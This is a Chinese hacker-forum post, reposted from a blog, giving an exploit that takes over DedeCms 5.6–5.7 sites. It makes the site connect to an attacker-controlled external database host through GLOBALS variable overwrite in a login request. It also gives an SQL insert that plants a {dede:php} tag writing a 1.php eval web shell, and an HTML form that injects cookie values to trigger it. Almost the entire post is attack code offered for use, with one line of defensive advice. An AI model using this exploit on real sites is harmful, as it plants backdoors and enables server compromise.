蓝盟诗人[LUC]蓝客联盟

忘记密码

DedeCms v5.6-5.7 拿 WebShell EXP

2011-09-02 18:42 作者: 来源: 本站 浏览: 2,663 views 我要评论 字号:

入侵EXP如下:
[php]
dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root[/php]

此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell
因此大家一定要养成使用DEDECM建站时改后台名字的习惯。

接下来:
前题条件,必须准备好自己的dede数据库,然后插入数据:
[php]
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval($_POST[c])?>\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"><input type="text" value="http://www.laod.org/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /><input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /><input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /><input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /><input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /><input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /><input type="text" value="true" name="nocache" style="width:400"><input type="submit" value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){ document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>
[/php]
转自:黑礼服`s BLOG http://hi.baidu.com/heilifubolg/blog/item/9ceb7ff3813a7e38730eec34.html

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

**/